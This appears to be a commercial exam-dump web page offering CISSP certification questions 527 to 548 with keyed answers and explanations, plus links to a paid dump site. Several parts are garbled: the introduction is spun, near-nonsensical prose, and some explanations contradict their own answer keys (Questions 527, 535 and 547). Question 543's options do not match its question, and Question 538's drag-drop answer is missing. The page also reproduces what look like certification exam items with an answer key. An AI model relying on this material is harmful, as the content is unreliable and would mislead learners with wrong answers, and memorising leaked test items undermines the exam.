Get Latest [Oct-2021] Conduct effective penetration tests using Dumpexams CISSP
Penetration testers simulate CISSP exam PDF
ISC CISSP Exam Syllabus Topics:
| Topic | Details |
|---|---|
| Topic 1 |
|
| Topic 2 |
|
| Topic 3 |
|
| Topic 5 |
|
| Topic 6 |
|
| Topic 7 |
|
Difficulty in Writing CISSP test: Certified Information Systems Security Professional
There are two primary sorts of assets for readiness of accreditation tests first there are the examination guides and the books that are point by point and reasonable for developing information from ground then there are video instructional exercise and talks that can by one way or another facilitate the agony of through investigation and are nearly less exhausting for certain up-and-comers yet these interest time and focus from the student. Keen Candidates who need to construct a strong establishment taking all things together test points and related advances as a rule consolidate video addresses with study advisers for receive the rewards of both however there is one critical readiness device as frequently neglected by most applicants the training tests. Practice tests are worked to make understudies alright with the genuine test climate. Measurements have shown that most understudies bomb not because of that planning however because of test tension the dread of the obscure. Certificate questions.com master group prescribes you to set up certain notes on these subjects alongside it remember to rehearse ISC CISSP practice exam and ISC CISSP practice tests which been composed by our master group, Both these will help you a ton to clear this test with great imprints.
For more info visit:
NEW QUESTION 527
Suppose that you are the COMSEC - Communications Security custodian for a large, multinational corporation. Susie, from Finance approaches you in the break room saying that she lost her smart ID card that she uses to digitally sign and encrypt emails in the PKI.
What happens to the certificates contained on the smart card after the security officer takes appropriate action?
- A. New certificates are issued to the user
- B. They are added to the CRL
- C. They are reissued to the user
- D. The user may no longer have certificates
Answer: B
Explanation:
Explanation/Reference:
Explanation:
A certificate that is no longer trusted should be revoked.
The CA is responsible for creating and handing out certificates, maintaining them, and revoking them if necessary. Revocation is handled by the CA, and the revoked certificate information is stored on a certificate revocation list (CRL). This is a list of every certificate that has been revoked. This list is maintained and updated periodically. A certificate may be revoked because the key holder's private key was compromised or because the CA discovered the certificate was issued to the wrong person.
An analogy for the use of a CRL is how a driver's license is used by a police officer. If an officer pulls over Sean for speeding, the officer will ask to see Sean's license. The officer will then run a check on the license to find out if Sean is wanted for any other infractions of the law and to verify the license has not expired. The same thing happens when a person compares a certificate to a CRL. If the certificate became invalid for some reason, the CRL is the mechanism for the CA to let others know this information.
Incorrect Answers:
B: The certificates contained on the smart card should be revoked to invalidate the certificates. They should not be reissued; new certificates (with a different key) should be issued.
C: New certificates (containing new keys) should be issued to the user. However, this question is asking about the certificates stored on the lost smart card. The certificates contained on the smart card should be revoked.
D: It is not true that the user may no longer have certificates. New certificates with different keys can be issued to the user and the old certificates (the ones on the smart card) can be revoked.
References:
Harris, Shon, All In One CISSP Exam Guide, 6th Edition, McGraw-Hill, 2013, pp. 836-837
NEW QUESTION 528
Why should batch files and scripts be stored in a protected area?
- A. Because of the need-to-know concept
- B. Because they may contain credentials
- C. Because they cannot be accessed by operators
- D. Because of the least privilege concept
Answer: B
Explanation:
Topic 5, Operations Security
NEW QUESTION 529
Which one of the following is an advantage of an effective release control strategy form a configuration control standpoint?
- A. Ensures that a trace for all deliverables is maintained and auditable
- B. Ensures that there is no loss of functionality between releases
- C. Allows for future enhancements to existing features
- D. Enforces backward compatibility between releases
Answer: A
NEW QUESTION 530
Conducting a search without the delay of obtaining a warrant if destruction
of evidence seems imminent is possible under:
- A. Exigent Circumstances.
- B. Prudent Man Rule.
- C. Proximate Causation.
- D. Federal Sentencing Guidelines.
Answer: A
Explanation:
The other answers refer to other principles, guidelines, or rules.
NEW QUESTION 531
What level of assurance for a digital certificate verifies a user's name, address, social security number, and other information against a credit bureau database?
- A. Level 3/Class 3
- B. Level 1/Class 1
- C. Level 4/Class 4
- D. Level 2/Class 2
Answer: D
Explanation:
Users can obtain certificates with various levels of assurance. Here is a list that describe each of them:
-
Class 1/Level 1 for individuals, intended for email, no proof of identity
For example, level 1 certificates verify electronic mail addresses. This is done through the use of a personal information number that a user would supply when asked to register. This level of certificate may also provide a name as well as an electronic mail address; however, it may or may not be a genuine name (i.e., it could be an alias). This proves that a human being will reply back if you send an email to that name or email address.
-
Class 2/Level 2 is for organizations and companies for which proof of identity is required
Level 2 certificates verify a user's name, address, social security number, and other information against a credit bureau database.
-
Class 3/Level 3 is for servers and software signing, for which independent verification and checking of identity and authority is done by the issuing certificate authority Level 3 certificates are available to companies. This level of certificate provides photo identification to accompany the other items of information provided by a level 2 certificate.
-
Class 4 for online business transactions between companies
-
Class 5 for private organizations or governmental security
References:
http://en.wikipedia.org/wiki/Digital_certificate veriSign introduced the concept of classes of digital
certificates:
Also see:
Source: TIPTON, Harold F. & KRAUSE, Micki, Information Security Management Handbook, 4th
edition (volume 1), 2000, CRC Press, Chapter 3, Secured Connections to External Networks
(page 54).
NEW QUESTION 532
What is the prime directive of Risk Management?
- A. Reduce the risk to a tolerable level.
- B. Reduce all risks regardless of cost.
- C. Prosecute any employees that are violating published security policies.
- D. Transfer any risk to external third parties.
Answer: A
Explanation:
The correct answer is "Reduce the risk to a tolerable level. Risk can never be eliminated, and Risk
Management must find the level of risk the organization can tolerate
and still function effectively.
NEW QUESTION 533
Which of the following is the MOST likely cause of a non-malicious data breach when the source of the data breach was an un-marked file cabinet containing sensitive documents?
- A. Lack of Data Loss Prevention (DLP) tools
- B. Ineffective identity management controls
- C. Lack of data access controls
- D. Ineffective data classification
Answer: D
NEW QUESTION 534
Which of the following would be the best reason for separating the test and development environments?
- A. To control the stability of the test environment.
- B. To segregate user and development staff.
- C. To secure access to systems under development.
- D. To restrict access to systems under test.
Answer: A
Explanation:
The test environment must be controlled and stable in order to ensure that
development projects are tested in a realistic environment which, as far as possible, mirrors the
live environment.
Reference(s) used for this question:
Information Systems Audit and Control Association, Certified Information Systems Auditor 2002
review manual, chapter 6: Business Application System Development, Acquisition, Implementation
and Maintenance (page 309).
NEW QUESTION 535
What is probing used for?
- A. To induce a user into taking an incorrect action
- B. To covertly listen to transmissions
- C. To use up all of a target's resources
- D. To give an attacker a road map of the network
Answer: D
Explanation:
The correct answer is "To give an attacker a road map of the network". Probing is a procedure whereby the intruder runs programs that scan the network to create a network map for later intrusion.
Answer "To induce a user into taking an incorrect action" is spoofing, c is the objective of a DoS attack, and d is passive eavesdropping.
NEW QUESTION 536
Which of the following is NOT a characteristic of a cryptographic hash function, H (m), where m denotes the message being hashed by the function H?
- A. The output is of fixed length.
- B. H (m) is a one-way function.
- C. H (m) is difficult to compute for any given m.
- D. H (m) is collision free.
Answer: C
Explanation:
For a cryptographic hash function, H (m) is relatively easy to compute for a given m.
*Answer "H (m) is collision free" is a characteristic of a good cryptographic hash function, in that collision free means that for a given message, M, that produces H (M) = Z, it is computationally infeasible to find another message, M1, such that H (M1) = Z.
*Answer "The output is of fixed length" is part of the definition of a hash function since it generates a fixed-length result that is independent of the length of the input message. This characteristic is useful for generating digital signatures since the signature can be applied to the fixed-length hash that is uniquely characteristic of the message instead of to the entire message, which is usually much longer than the hash.
*Answer "H (m) is a one-way function" relates to answer "H (m) is difficult to compute for any given m" in that a one-way function is difficult or impossible to invert. This means that for a hash function H (M) = Z, it is computationally infeasible to reverse the process and find M given the hash Z and the function H.
NEW QUESTION 537
For competitive reasons, the customers of a large shipping company called the "Integrated
International Secure Shipping Containers Corporation" (IISSCC) like to keep private the various cargos that they ship. IISSCC uses a secure database system based on the Bell-
LaPadula access control model to keep this information private. Different information in this database is classified at different levels. For example, the time and date a ship departs is labeled Unclassified, so customers can estimate when their cargos will arrive, but the contents of all shipping containers on the ship are labeled Top Secret to keep different shippers from viewing each other's cargos.
An unscrupulous fruit shipper, the "Association of Private Fuit Exporters, Limited" (APFEL) wants to learn whether or not a competitor, the "Fruit Is Good Corporation" (FIGCO), is shipping pineapples on the ship "S.S. Cruise Pacific" (S.S. CP). APFEL can't simply read the top secret contents in the IISSCC database because of the access model. A smart
APFEL worker, however, attempts to insert a false, unclassified record in the database that says that FIGCO is shipping pineapples on the S.S. CP, reasoning that if there is already a
FIGCO-pineapple-SSCP record then the insertion attempt will fail. But the attempt does not fail, so APFEL can't be sure whether or not FIGCO is shipping pineapples on the S.S. CP.
What is the name of the access control model property that prevented APFEL from reading
FIGCO's cargo information? What is a secure database technique that could explain why, when the insertion attempt succeeded, APFEL was still unsure whether or not FIGCO was shipping pineapples?
- A. Simple Security Property and Polymorphism
- B. Strong *-Property and Polyinstantiation
- C. Simple Security Property and Polyinstantiation
- D. *-Property and Polymorphism
Answer: C
Explanation:
The Simple Security Property states that a subject at a given clearance may not read an object at a higher classification, so unclassified APFEL could not read FIGCO's top secret cargo information.
Polyinstantiation permits a database to have two records that are identical except for their classifications (i.e., the primary key includes the classification). Thus, APFEL's new unclassified record did not collide with the real, top secret record, so APFEL was not able to learn about FIGs pineapples.
The following answers are incorrect:
*-Property and Polymorphism
The *-property states that a subject at a given clearance must not write to any object at a lower classification, which is irrelevant here because APFEL was trying to read data with a higher classification.
Polymorphism is a term that can refer to, among other things, viruses that can change their code to better hide from anti-virus programs or to objects of different types in an object- oriented program that are related by a common superclass and can, therefore, respond to a common set of methods in different ways. That's also irrelevant to this question.
Strong *-Property and Polyinstantiation
Half-right. The strong *-property limits a subject of a given clearance to writing only to objects with a matching classification. APFEL's attempt to insert an unclassified record was consistent with this property, but that has nothing to do with preventing APFEL from reading top secret information.
Simple Security Property and Polymorphism
Also half-right. See above for why Polymorphism is wrong.
The following reference(s) were/was used to create this question:
HARRIS, Shon, CISSP All-in-one Exam Guide, Third Edition, McGraw-Hill/Osborne, 2005
Chapter 5: Security Models and Architecture (page 280)
Chapter 11: Application and System Development (page 828)
NEW QUESTION 538
DRAG DROP
In which order should the following steps be taken to create an
emergency management plan?
Answer:
Explanation:
Explanation:
60-2
The proper order of steps in the emergency management planning
process is:
Establish a planning team
Analyze capabilities and hazards
Develop the plan
Implement the plan
Source: Emergency Management Guide for Business and Industry,
Federal Emergency Management Agency, August 1998.
NEW QUESTION 539
What security model implies a central authority that determines what subjects can have access to
what objects?
- A. Non-discretionary access control
- B. Discretionary access control
- C. Centralized access control
- D. Mandatory access control
Answer: A
Explanation:
A role-based access control (RBAC) model, also called nondiscretionary access control, uses a centrally administrated set of controls to determine how subjects and objects interact. - Shon Harris, "CISSP All-in-One Exam Guide", 3rd Ed, p 165.
NEW QUESTION 540
In what way can violation clipping levels assist in violation tracking and analysis?
- A. Clipping levels enable the security administrator to customize the audit trail to record only actions for users with access to usercodes with a privileged status
- B. Clipping levels enable a security administrator to customize the audit trail to record only those violations which are deemed to be security relevant
- C. Clipping levels enable a security administrator to view all reductions in security levels which have been made to usercodes which have incurred violations
- D. Clipping levels set a baseline for normal user errors, and violations exceeding that threshold will be recorded for analysis of why the violations occurred
Answer: D
NEW QUESTION 541
Which of the following would best describe a cold backup site?
- A. A computer facility with electrical power and HVAC, all needed applications installed and configured on the file/print servers, and enough workstations present to begin processing
- B. A computer facility with electrical power and HVAC but with no
workstations or servers on-site prior to the event and no applications
installed - C. A computer facility available with electrical power and HVAC and some file/print servers, although the applications are not installed or configured and all of the needed workstations may not be on site or ready to begin processing
- D. A computer facility with no electrical power or HVAC
Answer: B
Explanation:
A computer facility with electrical power
and HVAC, with workstations and servers available to be brought
on-site when the event begins and no applications installed, is a cold
site.
* Answer "A computer facility with electrical power and HVAC, all needed applications installed and configured on the file/print servers, and enough workstations present to begin processing" is a hot site
*answer "A computer facility available with electrical power and HVAC and some file/print servers, although the applications are not installed or configured and all of the needed workstations may not be on site or ready to begin processing" is a warm site. *Answer "A computer facility with no electrical power or HVAC" is just an empty room.
NEW QUESTION 542
Which of the following technologies is a target of XSS or CSS (Cross-Site Scripting) attacks?
- A. DNS Servers
- B. Web Applications
- C. Firewalls
- D. Intrusion Detection Systems
Answer: B
Explanation:
XSS or Cross-Site Scripting is a threat to web applications where malicious code is
placed on a website that attacks the use using their existing authenticated session status.
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected
into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an
attacker uses a web application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and
occur anywhere a web application uses input from a user in the output it generates without
validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's
browser has no way to know that the script should not be trusted, and will execute the script.
Because it thinks the script came from a trusted source, the malicious script can access any
cookies, session tokens, or other sensitive information retained by your browser and used with
that site. These scripts can even rewrite the content of the HTML page.
Mitigation:
-Configure your IPS - Intrusion Prevention System to detect and suppress this traffic.
-Input Validation on the web application to normalize inputted data.
-Set web apps to bind session cookies to the IP Address of the legitimate user and only permit that IP Address to use that cookie.
See the XSS (Cross Site Scripting) Prevention Cheat Sheet See the Abridged XSS Prevention Cheat Sheet See the DOM based XSS Prevention Cheat Sheet See the OWASP Development Guide article on Phishing. See the OWASP Development Guide article on Data Validation.
The following answers are incorrect:
-Intrusion Detection Systems: Sorry. IDS Systems aren't usually the target of XSS attacks but a properly-configured IDS/IPS can "detect and report on malicious string and suppress the TCP connection in an attempt to mitigate the threat.
-Firewalls: Sorry. Firewalls aren't usually the target of XSS attacks.
-DNS Servers: Same as above, DNS Servers aren't usually targeted in XSS attacks but they play a key role in the domain name resolution in the XSS attack process.
The following reference(s) was used to create this question:
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
NEW QUESTION 543
How should the retention period for an organization's social media content be defined?
- A. Wireless Access Points (AP)
- B. Trusted platforms
- C. Host-based firewalls
- D. Token-based authentication
Answer: C
NEW QUESTION 544
Which of the following type of traffic can easily be filtered with a stateful packet filter by enforcing the context or state of the request?
- A. TCP
- B. ICMP
- C. IP
- D. UDP
Answer: A
Explanation:
The question is explict in asking *easily*. With TCP connection establishment there is a distinct state or sequence that can be expected. Consult the references for further details.
ICMP, IP and UDP don't have any concept of a session; i.e. each packet or datagram is handled individually, with no reference to the contents of the previous one. With no sessions, these protocols usually cannot be filtered on the state of the session.
Some newer firewalls, however, simulate the concept of state for these protocols, and filter out unexpected packets based upon normal usage. Although these are commonly treated like normal stateful filters, they are more complex to program, and hence more prone to errors.
A stateful packet filter or stateful inspection inspects each packet and only allows known connection states through. So, if a SYN/ACK packet was recieved and there was not a prior SYN packet sent it would filter that packet and not let it in. The correct sequence of steps are known and if the sequence or state is incorrect then it is dropped.
The incorrect answers are: ICMP. ICMP is basically stateless so you could not *easily* filter them based on the state or sequence.
UDP. UDP has no real state so you could only partially filter them based on the state or sequence. The question was explicit in asking *easily*. While it is possible, UDP is not the best answer.
IP. IP would refer to the Internet Protocol and as such is stateless so you would not be able to filter it out *easily*.
The following reference(s) were used for this question:
http://www.nwo.net/ipf/ipf-howto.pdf
NEW QUESTION 545
Which one of the following authentication mechanisms creates a problem for mobile users?
- A. One-time password mechanism.
- B. Mechanism with reusable passwords
- C. Challenge response mechanism.
- D. Mechanisms based on IP addresses
Answer: D
Explanation:
Anything based on a fixed IP address would be a problem for mobile users because their location and its associated IP address can change from one time to the next.
Many providers will assign a new IP every time the device would be restarted. For example an insurance adjuster using a laptop to file claims online. He goes to a different client each time and the address changes every time he connects to the ISP.
NOTE FROM CLEMENT:
The term MOBILE in this case is synonymous with Road Warriors where a user is constantly traveling and changing location. With smartphone today that may not be an issue but it would be an issue for laptops or WIFI tablets. Within a carrier network the IP will tend to be the same and would change rarely. So this question is more applicable to devices that are not cellular devices but in some cases this issue could affect cellular devices as well.
The following answers are incorrect:
Mechanism with reusable password. This is incorrect because reusable password mechanism would not present a problem for mobile users. They are the least secure and change only at specific interval one-time password mechanism. This is incorrect because a one-time password mechanism would not present a problem for mobile users. Many are based on a clock and not on the IP address of the user Challenge response mechanism.
This is incorrect because challenge response mechanism would not present a problem for mobile users.
NEW QUESTION 546
You have been approached by one of your clients . They are interested in doing some security re-engineering . The client is looking at various information security models. It is a highly secure environment where data at high classifications cannot be leaked to subjects at lower classifications . Of primary concern to them, is the identification of potential covert channel. As an Information Security Professional , which model would you recommend to the client?
- A. Information Flow Model combined with Bell Lapadula
- B. Biba
- C. Bell Lapadula
- D. Information Flow Model
Answer: A
Explanation:
Securing the data manipulated by computing systems has been a challenge in the past years. Several methods to limit the information disclosure exist today, such as access control lists, firewalls, and cryptography. However, although these methods do impose limits on the information that is released by a system, they provide no guarantees about information propagation. For example, access control lists of file systems prevent unauthorized file access, but they do not control how the data is used afterwards. Similarly, cryptography provides a means to exchange information privately across a non-secure channel, but no guarantees about the confidentiality of the data are given once it is decrypted.
In low level information flow analysis, each variable is usually assigned a security level. The basic model comprises two distinct levels: low and high, meaning, respectively, publicly observable information, and secret information. To ensure confidentiality, flowing information from high to low variables should not be allowed. On the other hand, to ensure integrity, flows to high variables should be restricted.
More generally, the security levels can be viewed as a lattice with information flowing only upwards in the lattice.
Noninterference Models This could have been another good answer as it would help in minimizing the damage from covert channels.
The goal of a noninterference model is to help ensure that high-level actions (inputs) do not determine what low-level user s can see (outputs ) . Most of the security models presented are secured by permitting restricted ows between high- and low-level users. The noninterference model maintains activities at different security levels to separate these levels from each other. In this way, it minimizes leakages that may happen through covert channels, because there is complete separation (noninterference) between security levels. Because a user at a higher security level has no way to interfere with the activities at a lower level, the lower-level user cannot get any information from the higher leve.
The following answers are incorrect: Bell Lapadula
The Bell-LaPadula Model (abbreviated BLP) is a state machine model used for enforcing access control in government and military applications. It was developed by David Elliott Bell and Leonard
J. LaPadula, subsequent to strong guidance from Roger R. Schell to formalize the U.S. Department of Defense (DoD) multilevel security (MLS) policy. The model is a formal state transition model of computer security policy that describes a set of access control rules which use security labels on objects and clearances for subjects. Security labels range from the most sensitive (e.g."Top Secret"), down to the least sensitive (e.g., "Unclassified" or "Public").
The Bell-LaPadula model focuses on data confidentiality and controlled access to classified information, in contrast to the Biba Integrity Model which describes rules for the protection of data integrity. In this formal model, the entities in an information system are divided into subjects and objects. The notion of a "secure state" is defined, and it is proven that each state transition preserves security by moving from secure state to secure state, thereby inductively proving that the system satisfies the security objectives of the model. The Bell-LaPadula model is built on the concept of a state machine with a set of allowable states in a computer network system. The transition from one state to another state is defined by transition functions.
A system state is defined to be "secure" if the only permitted access modes of subjects to objects are in accordance with a security policy. To determine whether a specific access mode is allowed, the clearance of a subject is compared to the classification of the object (more precisely, to the combination of classification and set of compartments, making up the security level) to determine if the subject is authorized for the specific access mode. The clearance/classification scheme is expressed in terms of a lattice. The model defines two mandatory access control (MAC) rules and one discretionary access control (DAC) rule with three security properties:
The Simple Security Property - a subject at a given security level may not read an object at a higher security level (no read-up). The -property (read "star"-property) - a subject at a given security level must not write to any object at a lower security level (no write-down). The -property is also known as the Confinement property. The Discretionary Security Property - use of an access matrix to specify the discretionary access
control.
The transfer of information from a high-sensitivity document to a lower-sensitivity document may
happen in the Bell-LaPadula model via the concept of trusted subjects. Trusted Subjects are not
restricted by the -property. Untrusted subjects are. Trusted Subjects must be shown to be
trustworthy with regard to the security policy. This security model is directed toward access control
and is characterized by the phrase: "no read up, no write down."
With Bell-LaPadula, users can create content only at or above their own security level (i.e. secret
researchers can create secret or top-secret files but may not create public files; no write-down).
Conversely, users can view content only at or below their own security level (i.e. secret
researchers can view public or secret files, but may not view top-secret files; no read-up).
The Bell-LaPadula model explicitly defined its scope. It did not treat the following extensively:
Covert channels. Passing information via pre-arranged actions was described briefly.
Networks of systems. Later modeling work did address this topic.
Policies outside multilevel security. Work in the early 1990s showed that MLS is one version of
boolean policies, as are all other published policies.
Biba
The Biba Model or Biba Integrity Model developed by Kenneth J. Biba in 1977, is a formal state
transition system of computer security policy that describes a set of access control rules designed
to ensure data integrity. Data and subjects are grouped into ordered levels of integrity. The model
is designed so that subjects may not corrupt objects in a level ranked higher than the subject, or
be corrupted by objects from a lower level than the subject.
In general the model was developed to circumvent a weakness in the Bell-LaPadula model which
only addresses data confidentiality.
In general, preservation of data integrity has three goals:
Prevent data modification by unauthorized parties
Prevent unauthorized data modification by authorized parties
Maintain internal and external consistency (i.e. data reflects the real world)
Note: Biba address only the first goal of integrity while Clark-Wilson addresses all three
This security model is directed toward data integrity (rather than confidentiality) and is
characterized by the phrase: "no read down, no write up". This is in contrast to the Bell-LaPadula
model which is characterized by the phrase "no write down, no read up".
In the Biba model, users can only create content at or below their own integrity level (a monk may
write a prayer book that can be read by commoners, but not one to be read by a high priest).
Conversely, users can only view content at or above their own integrity level (a monk may read a
book written by the high priest, but may not read a pamphlet written by a lowly commoner).
Another analogy to consider is that of the military chain of command. A General may write orders
to a Colonel, who can issue these orders to a Major. In this fashion, the General's original orders
are kept intact and the mission of the military is protected (thus, "no read down" integrity).
Conversely, a Private can never issue orders to his Sergeant, who may never issue orders to a
Lieutenant, also protecting the integrity of the mission ("no write up").
The Biba model defines a set of security rules similar to the Bell-LaPadula model. These rules are
the reverse of the Bell-LaPadula rules:
The Simple Integrity Axiom states that a subject at a given level of integrity must not read an
object at a lower integrity level (no read down).
The * (star) Integrity Axiom states that a subject at a given level of integrity must not write to any
object at a higher level of integrity (no write up).
Lattice Model
In computer security, lattice-based access control (LBAC) is a complex access control model
based on the interaction between any combination of objects (such as resources, computers, and
applications) and subjects (such as individuals, groups or organizations).
In this type of label-based mandatory access control model, a lattice is used to define the levels of
security that an object may have and that a subject may have access to. The subject is only
allowed to access an object if the security level of the subject is greater than or equal to that of the
object.
Mathematically, the security level access may also be expressed in terms of the lattice (a partial
order set) where each object and subject have a greatest lower bound (meet) and least upper
bound (join) of access rights. For example, if two subjects A and B need access to an object, the
security level is defined as the meet of the levels of A and B. In another example, if two objects X
and Y are combined, they form another object Z, which is assigned the security level formed by
the join of the levels of X and Y.
The following reference(s) were/was used to create this question:
ISC2 Review Seminar Student Manual V8.00 page 255.
Dorothy Denning developed the information flow model to address convert channels .
and
The ISC2 Official Study Guide, Second Edition, on page 683-685
and
https://secure.wikimedia.org/wikipedia/en/wiki/Biba_security_model
and
https://secure.wikimedia.org/wikipedia/en/wiki/Bell%E2%80%93LaPadula_model and https://secure.wikimedia.org/wikipedia/en/wiki/Lattice-based_access_control
NEW QUESTION 547
Which of the following is addressed by Kerberos?
- A. Confidentiality and Integrity
- B. Validation and Integrity
- C. Auditability and Integrity
- D. Authentication and Availability
Answer: A
Explanation:
Explanation/Reference:
Explanation:
Kerberos is a trusted, third party authentication protocol that was developed under Project Athena at MIT.
In Greek mythology, Kerberos is a three-headed dog that guards the entrance to the Underworld. Using symmetric key cryptography, Kerberos authenticates clients to other entities on a network of which a client requires services.
Kerberos addresses the confidentiality and integrity of information. It does not directly address availability and attacks such as frequency analysis.
Incorrect Answers:
B: Kerberos an authentication protocol. However, it does not address availability.
C: Kerberos does address integrity but it does not address validation.
D: Kerberos does address integrity but it does not address auditability.
References:
Krutz, Ronald L. and Russell Dean Vines, The CISSP and CAP Prep Guide: Mastering CISSP and CAP, Wiley Publishing, Indianapolis, 2007, p. 78
NEW QUESTION 548
......
Tested Material Used To CISSP Test Engine: https://www.dumpexams.com/CISSP-real-answers.html
Steps Necessary To Pass The CISSP Exam: https://drive.google.com/open?id=1cvakUo7QqDOVS8Q0NeZ5jr56yepismox